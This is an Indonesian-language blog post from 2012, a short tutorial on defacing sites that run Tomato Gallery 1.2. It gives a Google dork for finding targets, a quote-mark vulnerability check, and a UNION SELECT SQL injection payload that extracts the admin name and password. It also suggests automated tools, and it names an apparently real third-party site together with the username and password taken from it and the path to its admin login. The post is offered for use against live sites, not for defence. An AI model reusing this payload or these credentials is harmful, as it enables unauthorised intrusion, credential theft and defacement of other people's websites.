Baru pertama bikin dokumen nih. Semoga
dengan dokumen ini bisa memberi pencerahan dalam belajar deface. Oke deh
karna saya ganteng maka langsung aja :vMasukin dork ini digoogle:
inurl:"tomato_gallery_1_2"
Setelah itu, tambahkan url ini "includes/album.php?album=1" dibelakang url "/tomato_gallery_1_2/"
Contoh: http://localhost/tomato_gallery_1_2/includes/album.php?album=1
Lalu cek apakah url itu vuln atau tidak dengan menambahkan karakter '
Contoh: http://localhost/tomato_gallery_1_2/includes/album.php?album=1'
Kalo ada pesan error seperti "You have an error in your SQL syntax;
check the manual that corresponds to your MySQL server version for the
right syntax to use near ''1''' at line 1" maka tandanya url itu
vuln.Jika sudah seperti itu, langsung inject pake havij atau SQLmap,
atau jika mau manual tambahkan url ini "
-1' union select adminName,2,3,adminPass,5,6,7,8 from tomato_gallery_settings WHERE 1='1
"
Contoh web:
http://www.vibru.nl/test/tomato_gallery_...E%201=%271
Username: victor
Password: editor
Untuk login tambahkan "edit/login.php" di belakang "/tomato_gallery_1_2/"
Yup segitu dulu, moga mudah dimengerti ^^
Wednesday, October 10, 2012
Home »
» SQLi Tomato Gallery
SQLi Tomato Gallery
8:48:00 AM
No comments
0 komentar:
Post a Comment